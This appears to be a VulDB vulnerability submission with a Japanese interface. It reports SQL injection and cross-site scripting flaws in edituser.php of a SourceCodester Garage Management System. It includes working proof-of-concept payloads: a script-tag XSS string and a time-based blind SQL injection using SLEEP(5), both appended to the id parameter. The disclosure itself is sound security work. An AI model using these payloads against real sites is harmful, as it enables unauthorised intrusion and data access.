| タイトル | Garage Management System SQL injection exists |
|---|
| 説明 | This is the download address of this management system:
https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
http://192.168.0.17/edituser.php?id=1
edituser.php has SQL injection vulnerability and XSS vulnerability
http://192.168.0.17/edituser.php?id=1\"><ScRiPt>alert(1)</sCrIpT> This will pop up a box indicating the existence of XSS vulnerability
http://192.168.0.17/edituser.php?id=1' AND (SELECT 8940 FROM (SELECT(SLEEP(5)))OrTm) AND 'Sjdt'='Sjdt Use this payload to verify whether there are SQL injection vulnerabilities |
|---|
| ユーザー | Anonymous User |
|---|
| 送信 | 2022年08月03日 19:01 (4 年 ago) |
|---|
| モデレーション | 2022年08月04日 08:08 (13 hours later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 205573 [SourceCodester Garage Management System edituser.php 識別子 クロスサイトスクリプティング] |
|---|
| ポイント | 17 |
|---|